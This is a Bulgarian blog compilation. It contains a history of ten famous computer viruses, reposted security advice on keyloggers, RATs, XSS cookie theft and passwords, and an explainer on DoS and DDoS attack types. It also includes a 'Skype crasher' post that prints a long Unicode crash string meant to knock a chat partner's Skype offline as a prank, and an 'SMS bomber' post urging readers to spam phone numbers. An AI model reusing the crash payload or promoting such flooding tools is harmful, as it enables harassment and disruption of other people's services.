В добрите стари времена вирусите са зависели от хората за да се разпространят на други компютри. Хакер записва вирус на диск и тогава разпространява дискът на други хора. Прехвърлянето на вируси не е било истински проблем до преди появата на модемите. Днес ние мислим за компютърния вирус като за нещо, което се прехвърля по интернет. Може да зарази компютри чрез електронната поща или уеб адреси. Такива програми могат да се разпространяват много по-бързо от ранните компютърни вируси.

Ще разгледаме 10-те най-лоши компютърни вируса.

10: Melissa

През пролетта на 1999г, Дейвид Л. Смит създава компютърен вирус базиран на Microsoft Word macro. Той прави вируса, така че да се разпространява чрез съобщения по електронната поща. Смит кръщава вирусът „Мелиса” на екзотична танцьорка от Флорида.

Мелиса кара получателите си да отворят документ с имейл съобщение като „Ето документа, който искаше, не го показвай на никой друг.” Веднъж активиран, вирусът се размножава и изпраща себе си на първите 50 човека от имейл адресите на жертвата.

Разпространява се бързо след като Смит го пуска по света. ФБР започва да се интересува от работата на Смит – според тяхно изявление, вирусът Мелиса „ причинява щети на правителствени и частни мрежи”. Увеличаването на имейл трафикът принуждава някои компании да спрат програмите си.

След доста дълъг процес, Смит губи делото си и получава присъда от 20 месеца затвор. Съдът глобява Смит и с $5000 и му забранява достъп до компютър без разрешението на съда. В края на краищата вирусът Мелиса не нанася непоправими големи вреди на интернет, но е един от първите компютърни вируси, получил публичност.

9: ILOVEYOY

Една година след Мелиса, дигитална заплаха тръгва от Филипините. За разлика от Мелиса, тази заплаха идва под формата на червей – тя е самостоятелна програма, способна да се размножава сама.

ILOVEYOU първоначално пътува по интернет чрез имейли. Заглавието на имейла казвало, че това е любовно писмо от таен обожател. Прикрепеният файл в писмото е причината за проблемите. Оригиналният файл на червеят е имал име LOVE-LETTER-FOR-YOU.TXT.vbs. Окончанието .vbs сочи и езикът, използван от хакера за да създаде червея: Visual Basic.

Според антивирусния софтуеър на McAfee, ILOVEYOU атакува по различни начини:

Копира себе си няколко пъти и скрива копията в папки на компютъра на жертвата.
Добавя нови регистри.
Замества няколко различни вида файлове с копия на себе си.
Изпраща се чрез IRC и email.
Изтегля файл с името WIN-BUGSFIX.EXE от интернет и го активира. Вместо да оправя грешки, тази програма краде пароли, които изпраща тайно на имейл адреса на хакера.



Кой е създал ILOVEYOU? Някои смятат, че е Онил де Гузман от Филипините. Властите разследват Гузман по обвинения в кражба – по това време Филипините нямат закони против компютърен шпионаж или саботаж. Поради липса на доказателства обвиненията отпадат, като Гузман нито отрича, нито потвърждава отговорността си за вируса. Според някои изчисления, вирусът е причинил щети за $10 милиарда.

8: The Klez Virus

Klez маркира нова посока за компютърнтие вируси, поставяйки летвата на високо за тези след него. Дебютира в края на 2001 г. а вариации на вируса плъзват из интернет няколко месеца по-късно. Червеят Klez заразява компютъра на жертвата чрез имейл съобщение, размножава се и се изпраща сам на адресите от електронната поща на жертвата. Някои разновидности на вируса вървят с други вредни програми, които могат да повредят компютъра на жертвата. В зависимост от версията, Klez може да се държи като нормален компютърен вирус, червей или като троянски кон. Може дори да изключи антивирусна програма и да се прави на такава.

Малко след като се появява в интернет, хакери модифицират Klez по начин, който го прави още по-ефективен. Като другите вируси може да се прихване от електронната поща и да се саморазпраща . Но може и да вземе друго има от списъка с контакти и да го използва като име, от което се изпраща. Това се нарича spoofing – имейлът изглежда, че идва от един източник, а всъщност е от съвсем друг.

7: Code Red и Code Red 2

Това са червеи, появили се през лятото на 2001 г. И двата проникват в операционната система, чрез уязвимост в Windows 200 и Windows NT. Уязвимостта била пренатоварване на буфера, което означава, че компютрите с тези операционни системи получават повече информация, от колкото могат да поемат.

Оригиналният Code Red червей осъществявал DDoS атаки над Белия дом. Тоест, всички заразени компютри се опитват да се свържат със сърварите на Белия Дом едновременно, което претоварва машините.

Компютър с Windows 2000, заразен от Code Red 2 червея спира да се подчинява на собственика си. Червеят създава вратичка в операционната система на компютъра, което позволява на отдалечен потребител да управлява машината. Това е риск от системно ниво и е лоша новина за собственика на компютъра. Човекът зад вируса има достъп до информация от компютъра на жертвата и дори може да използва заразеният компютър за да извършва престъпления. Това означава, че собственика не само трябва се справи със вируса, но и може да попадне под ударите на закона за престъпления, които не е извършил.

Microsoft пускат пач за уязвимостта в Windows 2000 и Windows NT. След пачването, червеите вече не могат да заразят компютрите, но не премахва вирусите от вече заразените.

6: Nimda

Още един вирус от 2001 г. Нимда (Админ на обратно) се разпространява бързо по интернет, като става най-бързо разпространяващия се вирус по това време. Според TruSecure, на червеят му отнемат 22 минути за да влезе в топ списъка на вирусните атаки. Червеят Нимда атакува интернет сърварите. Въпреки, че може да зарази и домашен компютър, истинското му предназначение било да претовари интернет трафика. Може да се разпространява по интернет по няколко начина, включително по електронната поща. Това му помага да се разпространи по множество сървари за рекордно време. Вирусът създава вратичка в операционната система на жертвата. Това позволява на човека, стоящ зад атаката да получи достъп на ниво, равно на това, което има текущият потребител на компютъра. Тоест, ако потребител с ограничени права активира червея, атакуващия ще има същите ограничени права над машината. Ако жертвата има администраторски права, това означава пълен контрол.

5: SQL Slammer/Sapphire

През Януари 2003г. нов вирус се разпространява по уеб сърварите в интернет. Много от компютърните мрежи не били подготвени за атаката и в крайна сметка вирусът удря няколко важни системи. Срива се системата на Американската банка, спира номерът 911 и континентални авиолинии отменят няколко полета поради грешки при електронните билети. Виновникът за това бил SQL Slammer вирусът, познат още като Sapphire. Според някои изчисления е причинил щети за над $1 милиард преди антивирусните системи да се справят с проблема. Прогресът на вируса е добре документиран. Само няколко минути след като заразява първия интернет сървър, вирусът Slammer поразява и почти половината сървъри, на които се държи интернет.

4: MyDoom (Моят кошмар)

MyDoom (или Novarg) е друг червей, който може да създаде вратичка в операционната система на компютъра. Оригиналната му версия (има няколко различни версии) има две действия. Първото кара вирусът да започне DoS атака на 1 Февруари 2004г. Второто действие спира разпространението на вируса на 12 Февруари 2004г. Дори след спирането му, вратичките, създадени по време на заразата остават активни.По-късно същата година, втора атака на MyDoom срива няколко търсачки. Като останалите вируси, той търси имейл адреси в електронната поща на жертвата за да се разпространява. Но може и да изпраща заявки в търсачките и да използва откритите в резултатите имейл адреси. Търсачки, като Google започват да получават милиони заявки от заразени компютри. Тези атаки претоварват системите им и дори някои се сриват. MyDoom се разпространява чрез електронната поща и p2p мрежите. Според фирмата MessageLabs, едно от всеки 12 електронни съобщения съдържал вируса по това време.

3: Sasser и Netsky

Понякога създателите на компютърните вируси успяват да останат незаловени. Но от време на време властите намират начини да проследят вируса до създателя му. Такъв е случаят с вирусите Sasser и Netsky. 17 годишният германец Sven Jaschan създава двете програми и ги пуска в интернет. Въпреки, че двата червея се държат по различен начин, сходности в кода карат експертите да смята, че са дело на един и същ човек. Вирусът Sasser атакува компютрите чрез уязвимост в Microsoft Windows. За разлика от останалите червеи, той не се разпространява по електронната поща. Вместо това щом веднъж зарази компютър, той търси други уязвими системи. Свързва се с тези системи и ги кара да изтеглят вируса. Вирусът може да сканира произволни IP адреси за да открие потенциални жертви. Той изменя и операционната система, така че прави трудно изключването на компютъра без да се налага да му се дърпа щепсела. Вирусът Netsky се разпространява по електронната поща и Windows мрежите. Търси имейл адреси и се размножава чрез 22, 016 байтов прикачен файл. Може да изпълнява DoS атаки като така срива системите, които се опитват да понесат интернет трафика. Свен не влиза в затвора, а получава година и девет месеца пробация. Понеже не е бил пълнолетен не е съден като възрастен.

2: Leap-A/Oompa-A

Може би сте виждали рекламата на Apple Mac с Джъстин Лонг и Джон Ходжмън. Ходжмън посочва, че има повече от 100 000 вируса, които могат да поразят компютъра ви. Той казва, че тези вируси са предназначени за персоналните компютри, а не за Mac компютрите. До голяма степен това е вярно. Mac компютрите са от части защитени от вирусни атаки заради нещо наречено защита чрез неяснота. Apple има репутацията да пази операционната си система и хардуера затворена система – Apple произвеждат и хардуера и софтуеара. Това прави операционната система скрита. Mac компютрите не са толкова широко разпространение като персоналните на пазара. Хакер, който прави вирус за Mac няма да има толкова жертви, колкото би имал при персоналните компютри. Но това не е спряло поне един хакер. През 2006г., вирусът Leap-A, познат още като Oompa-A, се появява. Той използва iChat програма за съобщения за да заразява уязвими Mac компютри. Той търси в адресите на чата и изпраща съобщение на всеки от списъка. Съобщението съдържа зловреден файл, който изглежда като обикновено JPEG изображение. Leap-A не причинява големи щети, но показва, че дори и Mac компютрите могат да се заразят с вируси.

1: Storm Worm

Последният вирус в класацията ни е ужасният Storm Worm. Компютърните експерти по сигурността за първи път идентифицират червея през 2006 г. Хората започват да наричат вируса Storm Worm, защото едно от имейл съобщенията, носещи вируса има заглавието „230 жертви след буря в Европа.” Антивирусните компании го наричат с други имена. Symantec го наричат Peacomm, а McAfee пък Nuwar. Може да звучи объркващо, но има вирус 2001, наречен W32.Storm.Worm. Вирус 2001 и Storm Worm от 2006г. са две напълно различни програми. Storm Worm е троянски кон. Активира се от друга програма, която не е винаги една и съща. Някои версии на вируса превръщат компютъра в зомбита или ботове. Когато компютърът се зарази, той става уязвим на контрол от разстояние от човекът, изпратил вируса. Някои хакери използват Storm Worm за да създадат botnet и с него да изпращат спам съобщения по интернет. Много версии на троянския кон измамват жертвата да изтегли програмата чрез фалшиви връзки на сайтове за новини или видео клипове. Изпращащите вируса обикновено сменят заглавието на съобщенията, така че да отразява текущи събития. Например точно преди олимпийските игри в Пекин през 2008г., нова версия на червея се появява в електронните пощи със заглавия като „нова смъртоносна катастрофа в Китай” или „Най-смъртоносното земетресение в Китай”. Съобщението посочва връзка към видео клип или новини, свързани със заглавието, но когато го отворите се активира изтеглянето на червея. Няколко новинарски агенции и блогове посочват Storm Worm като една от най-лошите вирусни атаки от много години насам. През Юли 2007г. официално компания Postini твърди, че е засякла повече от 200 милиона имейл съобщения, съдържащи връзки към Storm Worm по време на атака, продължила няколко дни. За щастие не всяко съобщение е довело до изтеглянето на вируса.

Въпреки че Storm Worm е доста разпространен, не е особено трудно да се засече или премахне от компютърната система. Ако обновявате антивирусната си програма редовно и внимавате, когато получавате имейли от непознати хора или видите странни връзки, ще се спасите от подобни проблеми.

Източник: http://iskamdaznam.com/

Skype crasher - Как да изхвърлите някой от скайп

Skype crasher - Името на програмата говори само за себе си. Става въпрос за малка програма, която, при натискане на един бутон и при маркиране на чата с даден събеседник, изпраща код, който предизвиква серия от 2-3 грешки, след което Skype се затваря. Тази програма НЕ хаква Skype. Тя просто дава грешка на събеседника, доста е добра за забавление , но не виждам нищо сериозно в нея.
Работи на принципа спан на този код : : ส็็็็็็็็็็็็็็็็็็็็็็็็็ส็็็¬¬็็็็็็็็็็็็็็็็็็็็็็ส็็็็็็¬็¬็็็็็็็็็็็็็็็็​​​​​็็ส็็็็็็็็็¬็็¬็็็็็็็็็็็็็็ส็็็็็็็็็็็็-็็็¬็็็็็็็็็็ส็็็็็็็็็็็็็็็¬็็็็¬็็็็็็ส็็็็็็็็็็็็็็็็็็¬็็็็็¬็็ส็็็็็็็็็​​​​​็็็็็็็็็็็็¬็็็็ส็¬็็็็็็็็็็็็็็็็็็็็็็็¬็ส็็็็็-็็็็็็็็็็็็็็็็็็็็ส็¬็็็็็็็็¬็็็็็็็็็็็็็็็็ส็็็็¬็็็็็็็็็-็็็็็็็ ็็็็็ส็็็็็็็¬็็็็็็็็็็¬็็็็็็็็ส็็็็็็็็็็¬็็็็็็็็็็็¬็็็็ส็็็็็็็็็็็็็¬็็็็​​​​​็็็็็็็็¬ส็็็็็็็็็็็็็็็็-็็็็็็็็็ส็็็¬็็็็็็็็็็็็็็็็¬็็็็็็ส็็็็็็็¬
Линк за програмата : ТУК
Вирус скан : Тук

Преди да изкажете мнение програмата не работи моля да я тествате.Аз я проверих и работи идеално, за жалост я проверих в конферентен разговор и се наложи да направя нов понеже н езнам как се спира ефектът.

Няколко съвета, които могат да ви спестят неприятности. #2

Няколко съвета, които могат да ви спестят неприятности. #2 

Темата не е моя , но е тук с разрешението на автора "Necrosis" (cwi-group.org/) !

Част 2-ра .  Първа част може да бъде видяна ТУК

Реших да продължа дългите писания от миналия си пост в нова тема. Тук вече ще се запознаем малко по-подробно с начините за крадене на данни и как да се предпазим от тях.

Що е то вирус ? - когато някой каже „компютърен вирус”, всички се сещат за тези файлове, които се записват на вашият компютър без ваше разрешение, стартират се и се разпространяват без ваше разрешение. Вирусите са злонамерени файлове, чиято цел е краденето на данни. В последно време най-активно разпространените вируси са базирани на кейлогърите и ратовете.
Какво е кейлогър (keylogger) - може би се досещате, само като видите името. Това е вид вирус, който записва всичко което жертвата въведе на клавиатурата си - от чат до пароли.
Какво е рат (RAT = Remote Administration Tool) - плъховете са наистина доста коварни вируси. Тяхната цел е да вземат колкото се може повече информация от компютъра на жертвата. Различните видове ратове имат различни функции - едни могат да правят скрийнове, други могат да следят компютъра на жертвата денонощно.
Интересното е, че и ратовете и кейлогърите се записват под .exe разширение, което ги прави функциониращи само под операционната система Windows.
Как да се предпазим от тези гадини - задължително трябва да имате антивирусен софтуер. Сканирайте редовно, проверявайте за грешки в регистрите ( например с RegDoctor ). Не приемайте файлове с разширение .exe / .jpeg.exe и т.н. След като свалите / приемете даден файл, първо сканирайте с антивирусният си софтуер.
Все пак има FUD криптери, които правят вирусите неуловими от антивирусите. За щастие, тези криптери струват пари, а малко са хората които биха дали над 20 евро ( последният FUD криптер, който се продаваше в alboraaq беше толкова ), за да се сдобие с паролата ви на фейсбук акаунта ви.

Защо Linux няма вируси ? - отговорът на този въпрос е доста прост. Линукс базираните дистибуции не работят като windows. Тоест те не работят с администраторски акаунт. Например, преди време firefox имаше уязвимост, чрез която злонамереният човек ( кракера ) можеше само като ви накара да влезнете в една страница, да запише даден файл на вашияя компютър и да го стартира. Защо тогава линукс потребителите не пропищяха ? Понеже линукс работи с потребителски акаунт, а той няма права да маже по самата система ( освен по собствената папка ), вирусът не може да функционира правилно. Освен това системата работи с отворен код, което значи, че потребители от цял свят могат да спомогнат с поправянето на даден проблем. Дори и да се открие някаква уязвимост в linux-система, тя бива поправена за не повече от ден. Аз силно препоръчвам UBUNTU като дистрибуция за начинаещи и хора, които обичат стилната визия на една модерна система.
В момента за Internet Explorer 6, 7 и 8 има същия exploit. Сигурен съм, че скоро и за деветката ще излезе. Защо ли? 3 месеца след като излезе IE6 вече в microsoft знаеха, че има уязвимост. И както виждаме, в версия 7 и 8 тази уязвимост не е фиксната. Защо пък точно в 9тата да го оправят ?!

Ъпдейти ( Updates ) - безспроно ъпдейтите вършат доста голяма работа. Не знам защо доста windows потребители ги изключват. Може би защото са с пиратски копия? Това си е техен проблем. Моето лично мнение е, че когато дадена система / програма не е ъпдейтната до последната версия, тя не функционира на 100% правилно.
Логиката е много проста - щом е излязла нова версия / ъпдейт на даден софтуер ( например ), то значи в предишната има някаква грешка, която в новата версия е фиската и самият софтуер е подобрен. Едва ли има човек, който да не иска по-доброто.
Много важно е да ъпдейтвате вашия антивирусен софтуер. Повечето антивируси работят със сигнатури, които трябва винаги да бъдат обновени. Иначе излиза нов вирус, базата ви данни със сигнатури не е обновена - нищо не пречи на вируса да заобиколи антивируса и да си свърши своята работа.

Какво да правим, когато видим, че някой се опитва да ни атакува ? - някой се опитва да атакува вашия сайт или компютър ? Не си губете времето да пускате репорти по cybercrime, например. Те не се занимават с такива дребни атаки, целящи да вземат нечия парола и да я сменят. Те се борят с пиратското съдържание и т.н. Това, което трябва да направите, е да защитите вашият сайт / компютър до максимум. Проверете къде могат да са грешките ( уязвимостите ) и ги поправете. Повечето кракери не са особено умни и не са на повече от 15-16 години ( хах ). Ще опитат няколко начина и като видят, че не става - се отказват.
Всички знаем колко е готино да си кракер, който е пробил една голяма компания, например. Да бъдеш обсъждан по форуми, че може и да те дадат по телевизията. Доста хлапета се опитват да направят това, но понеже не им достига акъл, няколко часа след първия опит за пробив се отказват.
Не се плашете от заплахи - истинските ( умните ) кракери никога не заплашват жертвите си. Първо действат, след като намерят уязвимост в система докладват за нея - ако не се вземат мерки, тогава атакуват.

Как да се предпазим от крадене на лични данни ? - начините да се съберат лични данни са стотици. Най-лесно е да се напише името / никнеймът ви в google, от където ще се индексират една голяма част от профилите ви по разни сайтове. Ако сте въвели важна информация там - представете си колко „трудно” ще е на човека отсреща да разгледа и събере информация за вас.
Фейсбук - може би най-голямата база с лични данни. Аз лично съм събирал доста голяма информация за над 1 000 души от тази социална мрежа. Като се започне от любимия стил музика, продължи се с настояща работа и се завърши с интереси - всичко това може да бъде намерено от всеки, който пожелае. Най-лошото е, че точно тези данни могат да се използват за социално инженерство - това, с което ще продължа.

Социално инженерство - що е то ? - една голяма част от хората избират лесни пароли, които няма да забравят. Имена на родителите си, рождени дати, номер на лична карта и т.н. Обективно погледнато това е доста тъпо. Най-просто казано, социалното инженерство е метод за взимане на данни, крадене на пароли и т.н. Преди време четох едно доста интересно текстче, в което се описваше как с социална инжинерия можете да се доберете до компютрите на дадена компания, и то само чрез добър външен вид, добро държание и главно лъжа. В общи линии, социалната инжинерия е точно това - лъжа. Лъжа, с която да заблудиш хората и те сами да ти кажат това което искаш да разбереш, без те са се усетят.

Поздрави, Necrosis !

Няколко съвета, които могат да ви спестят неприятности. #1

Няколко съвета, които могат да ви спестят неприятности. #1
Темата не е моя , но е тук с разрешението на автора "Necrosis"  (cwi-group.org/) !



Никога не приемайте файлове от непознати. Особено с разширение .exe, .bat и т.н.
Както сигурно знаете, гадините от тип rat, keylogger и т.н. обикновенноз се разпротстраняват под такива разширения.
Но, не е задължително. Има стотици tool editor-и, които могат да направят вируса в jpeg формат, например. Дори в .src.
Моето лично мнение е, че на всеки компютър трябва да има антивирусна. И при получаване/изтегляне на файл, просто цъквате с десен бутон върху него - сканиране (почти всички антивирусни имат такава функция).

Ако не желаете да си качвате софтуер, който да се бори с гадините - можете да използвате он-лайн сканерите - например scanner2.novirusthanks.com. Просто избирате файла, който желаете да сканирате и след няколко секунди виждате резултатите.
Е, ако вируса е FUD, може да не се засече от антивируса, но повечето FUD криптери (даже май всички) са pri8, а едва ли някой който има такъв ще си прави труда за да се добере до вашите пароли, освен ако не сте някоя наистина важна личност и имате достъп до наистина голями сайтове/директории/системи, или на компютъра си имате много важна информация.

Ако ваш приятел желае да ви изпрати файл по скайп например, също проверете дали файла не е заразен. Защо ? Защото не знаете кой със сигурност седи от другата страна. Ако кракера е заразил вашият приятел, взел му е паролата и се е логнал в акаунта му - то може би иска да зарази и вас. В такива случаи (както спомена Иван Ванков в едно от видеата си) просто попитайте „приятеля си” (в кавички, защото не е сигурно, че е той) някакъв въпрос, на който само той може да даде отговор. Кога е била последната ви среща и т.н. - просто трябва да се убедите, че вие реално си пишете с вашият приятел.
Не отваряйте и съмнителни ликнове. Има доста начини кракера да вземе исканата от него информация, като само ви накара да влезнете в някой сайт. JavaDriveBy и .т.н.

Ако сте уебмастър, то сайта ви естествено ще бъде подложен на XSS атаки. Тези атаки целят крадене на бисквитките (cookies). Например, ако вашият сайт е уязвим към XSS атаки, кракера ще се опита да ви подмами да влезнете в линк към собственият ви сайт, където е „ръгнат” javascript код, който ще вземе вашите бисквитки и ще ги изпрати на кракера.

Е, това не е единствен начин да ви се вземат бисквитките. Доста кибер престъпници (хах) просто си създават акаунт в някой безплатен хостинг, качват си javascript-а, дават ви линк и когато вие кликнете на него - вече знаете какво става. Просто начина със собственият сайт на уебмастъра е по-удачен за кракера.
Какво може да стане, когато ви откраднат бисквитките - не, няма да умрете от глад. Те взимат сесиите и ги запаметяват. Тоест, когато например се логнете в този форум и кликнете на бутончето „запомни ме”, бисквитките запомнят, че точно вас трябва да ви логва автоматично когато влезнете в форума.
Когато някой ви открадне бисквитките (за кой ли път го казах), той просто ги слага върху своят браузър (не буквално), рефрешва си страницата и самият той вече е логнат с вашият акаунт. От там той може да ви създаде доста проблеми и т.н.
Точно за това, доста уебмастъри използват SSL сертификат, който е доста добра защита срещу такива опити за крадене на данни.

Също така, използвайте дълги и сложни пароли - от типа на „23j2j2^!$skdh1823”. Не е нужно да е точно такава, но да е от такъв тип. Изберете си парола, нещо което да не може да бъде отгатнато от който и да е, добавете му няколко знака „!@№$%€§*()–+" например.
Не слагайте за пароли ЕГН-та, телефони, рожденни дати и т.н. - има стотици речници както с български, така и с чуждестранни комбинации от числа, които могат да се използват при bruteforce.
В никакъв случай не давайте паролите си на когото и да било (това може би го знаете).

Един съвет - не използвайте поща в mail.bg - има bruteforce скрипт за нея. Вярно, че отнема около 30 минути за да разпознае парола „123456”, но по-добре ползвайте hotmail.com / gmail.com/ mail.ru / abv.bg.

Все пак, винаги има начин да се открадне паролата ви. Ако някой успее да добие достъп до даден сайт в който имате регистрация и дъмп-не DB-то, когато го отвори ще види списък с всички потребители, техните пароли, мейл и т.н.
Доста от CMS системите използват md5/sha1 кодировка за паролите, които евентуално кракера ще види в .sql файла. Това също ще го затрудни, затова ако сте уебмастър и използвате собствена (авторска) система, използвайте различните видове кодировки за пароли. И не забравяйте - използвайте ги за информация, която няма да бъде видима за потребителите.

Не ползвайте едни и същи пароли навсякъде - горе съм споменал причината. Просто ако се извлече паролата ви от даден сайт, и тя съвпада с тази на акаунтите ви във всички сайтове в които имате регистрация - белята става голяма.

Също така, не пазете паролите си и важни данни в някакъв файл, който се поддържа на компютъра ви. Доста типове вируси, като rat например (главно cybergate), има функция за разглеждане на файлове, които са на машината на потенциалната жертва.

Не ги записвайте и на лист - все ще се намери някой, който ако намери листа с паролите ви, ще реши да се базика с вас.
Не е толкова трудно да запомните няколко пароли, при положение че всеки ден ще ги използвате и съответно ръцете ви ще придобият навик да ги пишат.

Доста се отклоних от дадената тема, но реших да напиша малко повече за това как изцяло да се предпазим от злонамерени атаки и т.н.

Как да получим безплатен трафик към сайт и същевременно да правим пари от това

Как да получим безплатен трафик към сайт и същевременно да правим пари от това
Проекта е от Китай.Става въпрос за програма в която въвеждате ваши линкове и така разменяте трафик с други хора абсолютно ЛЕГАЛНО , а също така аз лично я използвам и за допълнителен доход както сами ще видите на снимката.Много добра програма с единствен недостатък езика
Линк за програмата можете да намерите : ТУК 

Безплатни СМС до цял свят , СМС bomber , Kогато сайта изисква код получен от смс

Безплатни СМС - ТУК

СМС Бомбер
 Същото място само ,че не натискате един път бутона а спамите с мишката.Само ще ви помоля не преигравайте за да не ни клъцнат достъпа за МТЕЛ гарантирам че работи , за вивател го пробвайте и споделете отзив.

Когато сайта изисква код получен от смс:
Доста често срещан проблем неискаме да си даден номера във всеки сайт , но пък те искат да проверяват колко сме истински   С сайта се работи много лесно виждате няколко GSM номера от Норвегия избирате си единия въвеждате номера му където ви е нужен след 1 мин ( рефреш ) и получавате текста. От сайта призовават да се използват телефоните с най-малко трафик.А ето го и сайта ТУК

1 Част DOS атака – Oтказ на услугите

В 2 част очаквайте няколко съвременни такива програми

Името означава Denial of Service и означава отказ на услугите и има за цел да спре достъпа до определена част от сайт или самия сайт ,а също така и големи компютърни мрежи посредством Flood . Често такъв вид атаки се организират групово и мотивите за това са доста в повечето случаи това са протести на големи групи като Anonymous , да покажат на света ,че не са съгласни с дадено нещо.Най-често се използва атака при която даден сайт получава милиони заявки за външна комуникация и така се насища на 100% и сайта остава неработещ за други потребители.Атаките се считат за престъпление.Когато компютър от вашата мрежа пусне такъв вид атака срещу даден сървър това се отразява на цялата мрежа той заема целия трафик.Затова когато във вашата мрежа има заразени с вируси компютри които биват използвани за атаки върху сайтове това се отразява на цялата мрежа.

Симптоми за DOS – атака

Те включват

Нестабилна и слаба мрежа

Невъзможност да посетите даден сайт

Невъзможност да посетите всеки един сайт

Могат да бъдат също така и милиони писма които също блокират и препълват пощата за период от време

Могат да изменят мрежовата честота на Wireless Рутерите

Да спрат целия интернет да определен регион ( Представете си как 2000 заразени компютъра в даден град са заразени и консумират целия трафик на мрежата )



Видове DOS атаки – Най-често се разделят на два вида crash и flood услуги.Разделят се на пет основни вида.

Потребление на изчислителните ресурси , трафик ,препълване на дисковото пространство , времето на процесора

Прекъсване на TCP мрежовите услуги

Прекъсване на конфигурацията за маршрутите оказващи заявките

Прекъсване на физическите компоненти на мрежата

Възпрепятстване на медии за комуникация между потребителите и жертвата, така че те вече не могат да общуват адекватно.

DOS атака могат да включват изпълнение на зловреден софтуер, предназначен за:Използване максимално на CPU за да предотврати атаката.Software който може да направи по-нестабилен и да се изключи в даден момент машината.Търсещ грешки в операционната система и използващ тях за „ бой за системни ресурси „


Distributed attack  ( DDOS ) – Това е разделена атака когато дадена система или сайт е наводнена от множество потребители  използващи различни методи .Атаката е тясно целенасочена.Има доста различни програми които изпълняват тази функция като един от най-известните е MyDoom механизамът на програмата се задейства определен ден и час . Система може да бъде компрометирана с троянски кон, което позволява на атакуващия да изтеглите зомби агент на определени компютри които после участват в атаката . Stacheldraht е класически пример за DDoS инструмент. Тя използва слоеста структура, в която атакуващият използва клиентска програма, за да се свържете с „малката си армия компютри работещи за него „.Сега си представете човек ,който има на разположение 100 , 1000 или 10000 компютъра работещи за него готови да правят всичко какво им бива зададено .Тези системи са известни като ботнет .Ако атакуваме даден сайт/сървър от един компютър то атаката е DOS , но ако го направим от много хостове ( потребителски компютри или сървъри ) то тази атака е DDOS . Основната причина за DDOS както сигурно се сещате е ,че много компютри генерират повече трафик от един и е доста по добре (или зле въпрос на гледна точка ) . Именно с тази цел  след като „ хакера „ има достъп до даден сайт като администратор той качва зловреден код „ shell “  ,който му позволява да има пълен достъп до машината или троянски кон за потребителски компютър. Има случаи когато хората доброволно предоставят компютрите си за извършване на DDOS атаки пример за това е  2010г. атака срещу големи американски компании за кредитни карти . В този случай привърженици на Джулиан Асанж доброволно са свалили такъв software.



ICMP Flood - Тя разчита на неправилно конфигурирани мрежови устройства, които позволяват да бъдат изпратени пакети за всички компютърни хостове в даденамрежа, чрез излъчване адреса на мрежата, а не конкретна машина. Мрежата служикато усилвател . Тази атака изпраща голям брой пакети с дрес на източника , които фалшифицирано се появяват на адреса на жертвата.Мрежовата честота доста бързо ще се запълни и истинските пакети няма да достигат.P

Ping Flood – Това е атака при която атакуващия изпраща голям брой такива пакети към жертвата с цел да забави нета .За да е успешна такава атака трябва да имате интернет по-добър от на атакувания.

Ping of Death – Изпраща деформиран пинг пакет ,който има за цел да срине системата

SYN flood – Към атакувания се изпращат заявки от фалшив подател което пренасища броя връзки на сървъра

Teardrop attacks – Атака при която се изпращат файлове разкъсани на фрагменти които немогат да се покрият от атакувания.Най-често ползвана е при Windows 95 , 98 , NT , Vista при Vista атаката е към по-горен мрежов слой SMB2

Peer-to-peer атаки – Използва exploit-и в peer-to-peer сървъри за да започне DDoS атака.Най-често се използва DC++ за връзка . Те са различни от botnet базирани атаки.При този вид атаки хакера няма нужда да комуникира с клиента .Той само дава напътствия , инструктира клиентите да споделят голямо количество peer-to-peer файлове , хъба дисконектва и в резултат се вързват към жертвата.В резултат няколко хиляди компютъра могат агресивно да се опитват да се свържат към атакувания компютър.Когато нормален сървър обикновено може да подържа няколко стотин в секунда.Преди да започне да започне да дава грешки.С по модерни и големи peer-to-peer атаките стигат до 700 000 . Това са 700 000 IP адреса които устроиството трябва да блокира.Атаката е към порт 80 и ако не ви е нужен.Не е нужно да стой отворен на вашия личен компютър.

Nuke – е стар метод , който изпраща невалидни пакети до жертвата подобно на ICMP модифициран пинг , количеството е голямо и забавя компютъра докато недоведе до пълното му спиране.Конкретен пример за такъв вид атака е WinNuke използва уязвимост в NetBios изпраща данни до порт 139 TCP и на екрана виждате недотолкова любимия ни СИН екран